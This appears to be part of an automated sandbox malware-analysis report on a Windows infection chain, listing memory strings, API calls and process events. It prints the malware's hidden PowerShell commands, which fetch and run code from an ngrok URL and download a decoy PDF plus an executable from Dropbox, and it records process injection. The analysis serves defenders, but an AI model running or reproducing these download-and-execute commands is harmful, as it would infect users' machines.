                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592492
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020581A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020581A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54DEEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020581A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020581A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54DEEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020581A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020581A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                      Source: fontdrvhost.exe, 00000023.00000003.1907566147.0000000005510000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000004.00000002.1611862728.00000205F0DA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020581A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                      Source: svchost.exe, 00000007.00000002.2562818284.000002ACDD054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: msedge.exe, 00000006.00000003.1462052458.00002DF4024B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020581A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                      Source: powershell.exe, 00000004.00000002.1600433064.00000205F0868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BranchCaMSFT_NetEventVmNetworkAdatper.format.ps1xml
                      Source: fontdrvhost.exe, 00000023.00000003.1907566147.0000000005510000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020581A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020581A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54DEEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020581A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                      Source: svchost.exe, 00000007.00000002.2560035093.000002ACD782B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`c
                      Source: powershell.exe, 00000004.00000002.1600433064.00000205F0868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FcheSecondaryMSFT_NetEventVmNetworkAdatper.cdxml
                      Source: powershell.exe, 00000004.00000002.1605412320.00000205F0C40000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1477811435.000001D867444000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1782730898.000001E565B8A000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.1658831558.000002534E243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007A9098 VirtualAlloc,LdrInitializeThunk,VirtualFree,34_3_007A9098
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_004D7960 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,31_2_004D7960
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007A9277 mov eax, dword ptr fs:[00000030h]34_3_007A9277
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 35_3_02D10283 mov eax, dword ptr fs:[00000030h]35_3_02D10283
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_0052B440 GetProcessHeap,HeapAlloc,31_2_0052B440
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess created: C:\Users\user\AppData\Local\Temp\1061714629.exe "C:\Users\user~1\AppData\Local\Temp\1061714629.exe"

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeMemory written: C:\Users\user\AppData\Local\Temp\1061714629.exe base: 770000 value starts with: 4D5A
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing)Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\836808032.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user~1\AppData\Local\Temp\1902382389.pdf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\1061714629.exe "C:\Users\user~1\AppData\Local\Temp\1061714629.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$randompdf = \"$env:temp\$(get-random).pdf\"; $randomexe = \"$env:temp\$(get-random).exe\"; iwr -uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/lewis-silkin-llp.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -outfile $randompdf ; start-process msedge.exe -argumentlist \"--kiosk $randompdf\" ; iwr -uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -outfile $randomexe ; start $randomexe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$randompdf = \"$env:temp\$(get-random).pdf\"; $randomexe = \"$env:temp\$(get-random).exe\"; iwr -uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/lewis-silkin-llp.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -outfile $randompdf ; start-process msedge.exe -argumentlist \"--kiosk $randompdf\" ; iwr -uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -outfile $randomexe ; start $randomexe"
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_0079CDD5 cpuid 34_3_0079CDD5
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: GetCurrentThreadId,GetKeyboardLayout,GetLocaleInfoA,31_2_004C9670
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: GetCurrentThreadId,GetKeyboardLayout,GetLocaleInfoA,34_2_004C9670
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
